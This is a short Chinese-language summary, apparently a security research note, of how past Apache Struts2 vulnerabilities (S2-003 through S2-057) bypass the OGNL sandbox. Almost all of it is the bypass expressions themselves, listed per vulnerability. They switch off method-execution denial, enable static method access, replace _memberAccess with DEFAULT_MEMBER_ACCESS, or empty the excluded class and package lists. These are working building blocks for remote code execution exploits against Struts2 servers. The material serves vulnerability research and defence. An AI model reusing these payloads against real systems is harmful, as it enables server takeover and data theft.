Struts2 OGNL沙箱历史绕过方式总结


沙箱绕过

s2-003 绕过方式:

#context[\'xwork.MethodAccessor.denyMethodExecution\']=false, 
#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET

s2-005 绕过方式:

#_memberAccess.allowStaticMethodAccess=true
#context['xwork.MethodAccessor.denyMethodExecution']=false
#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET

S2-009 绕过方式:

#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false)
#_memberAccess["allowStaticMethodAccess"]=true

S2-013 绕过方式:

#_memberAccess["allowStaticMethodAccess"]=true

S2-016 绕过方式:

没有沙箱限制,直接执行OGNL表达式(TODO 未做深入研究)

S2-019 绕过方式:

#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),
#f.setAccessible(true),
#f.set(#_memberAccess,true)

S2-032 绕过方式:

#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS

S2-037 绕过方式:

#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS

S2-045 绕过方式:

(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(
    #_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm))))

S2-046 绕过方式:

和s2-045的绕过方式一致

S2-048 绕过方式:

和s2-045的绕过方式一致

S2-057 绕过方式:

(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))

(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))

引用

  1. 作为武器的CVE-2018-11776:绕过Apache Struts 2.5.16 OGNL 沙箱